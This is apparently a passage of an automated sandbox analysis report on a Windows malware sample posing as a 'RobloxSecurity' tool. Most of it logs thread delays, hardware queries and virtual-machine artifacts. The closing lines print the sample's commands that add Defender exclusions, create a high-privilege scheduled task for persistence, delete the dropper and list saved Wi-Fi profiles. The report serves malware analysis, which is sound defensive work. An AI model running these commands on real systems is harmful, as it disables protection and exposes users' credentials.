                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -599875s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -599765s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -599655s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -599546s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -599437s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -599328s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -599218s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -599107s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -598984s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -598875s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -598765s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -598656s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -598546s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -598437s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -598328s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -598218s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -598107s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -597970s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -597844s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -597734s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -597625s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -597515s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -597406s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -597297s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -597187s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -597077s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -596953s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -596843s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -596734s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -596625s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596515s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596406s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596297s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596187s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -596078s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -595969s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444Thread sleep time: -582622s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052Thread sleep time: -5534023222112862s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432Thread sleep time: -5534023222112862s >= -30000s
                  Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7732Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 128812Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 328804Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 491792Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe  |  Last function: Thread delayed
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Last function: Thread delayed
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Last function: Thread delayed
Source: C:\Windows\System32\OpenSSH\ssh.exe  |  Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe  |  Last function: Thread delayed
Source: C:\Windows\System32\OpenSSH\ssh.exe  |  Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe  |  Last function: Thread delayed
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe  |  Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe  |  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  |  Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe  |  Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 599641
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 599532
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 599407
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 599297
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 599063
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 598938
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 598813
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 598688
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 598578
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 598469
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 598344
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 598235
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 598109
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 598000
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 597891
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 597781
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 597665
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 597563
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 597438
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 597328
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 597219
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 597094
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 596985
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 596860
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 596735
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 596610
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 596485
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 596360
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 596235
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 596110
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 595985
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 595860
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 595735
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 595610
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 595485
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 595360
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 595235
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 599655
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 599107
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 598984
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 598765
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 598656
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 598546
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 598437
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 598328
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 598218
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 598107
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 597970
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 597844
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 597734
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 597625
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 597515
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 597406
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 597297
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 597187
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 597077
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 596953
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 596843
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 596734
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 596625
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 596515
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 596406
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 596297
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 596187
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 596078
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 595969
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 582622
Source: C:\Windows\System32\OpenSSH\ssh.exe  |  Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe  |  Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe  |  Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe  |  Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe  |  Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe  |  Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe  |  Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe  |  Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe  |  Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe  |  Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe  |  Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Thread delayed: delay time: 922337203685477
Source: Amcache.hve.41.dr  |  Binary or memory string: VMware
Source: Amcache.hve.41.dr  |  Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.41.dr  |  Binary or memory string: vmci.syshbin
Source: Amcache.hve.41.dr  |  Binary or memory string: VMware, Inc.
Source: Amcache.hve.41.dr  |  Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.41.dr  |  Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: vkefq4cv.oil.exe, 00000012.00000002.2063310153.0000010DD583F000.00000004.00000020.00020000.00000000.sdmp  |  Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
Source: Amcache.hve.41.dr  |  Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.41.dr  |  Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: vkefq4cv.oil.exe, 0000002A.00000002.2314304033.0000017A7149E000.00000004.00000020.00020000.00000000.sdmp  |  Binary or memory string: Hyper-V RAW
Source: Amcache.hve.41.dr  |  Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.41.dr  |  Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.41.dr  |  Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.41.dr  |  Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: jqOHOuPMJP.exe, 00000000.00000002.1797186606.0000000000FB0000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4115442750.000001B8A9D61000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000023.00000002.4114412277.0000019B798EF000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2314304033.0000017A7149E000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3543453931.00000167CFE24000.00000004.00000020.00020000.00000000.sdmp  |  Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ssh.exe, 00000021.00000002.4113726250.00000292607CC000.00000004.00000020.00020000.00000000.sdmp  |  Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
Source: Amcache.hve.41.dr  |  Binary or memory string: vmci.sys
Source: Amcache.hve.41.dr  |  Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.41.dr  |  Binary or memory string: vmci.syshbin`
Source: Amcache.hve.41.dr  |  Binary or memory string: \driver\vmci,\driver\pci
Source: jqOHOuPMJP.exe, 00000000.00000002.1817862177.0000000003DAA000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000000.1791180656.000001F995EB2000.00000002.00000001.01000000.00000008.sdmp, vkefq4cv.oil.exe.0.dr, vkefq4cv.oil.exe.4.dr  |  Binary or memory string: qemu'H
Source: Amcache.hve.41.dr  |  Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.41.dr  |  Binary or memory string: VMware20,1
Source: Amcache.hve.41.dr  |  Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.41.dr  |  Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.41.dr  |  Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.41.dr  |  Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.41.dr  |  Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.41.dr  |  Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.41.dr  |  Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.41.dr  |  Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.41.dr  |  Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.41.dr  |  Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: vkefq4cv.oil.exe, 0000002C.00000002.3000161085.000001EC7F363000.00000004.00000020.00020000.00000000.sdmp  |  Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^
Source: Amcache.hve.41.dr  |  Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe  |  Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Process queried: DebugPort
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe  |  Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  |  Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe  |  Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe  |  Process token adjusted: Debug
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe  |  Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe"
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 3
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
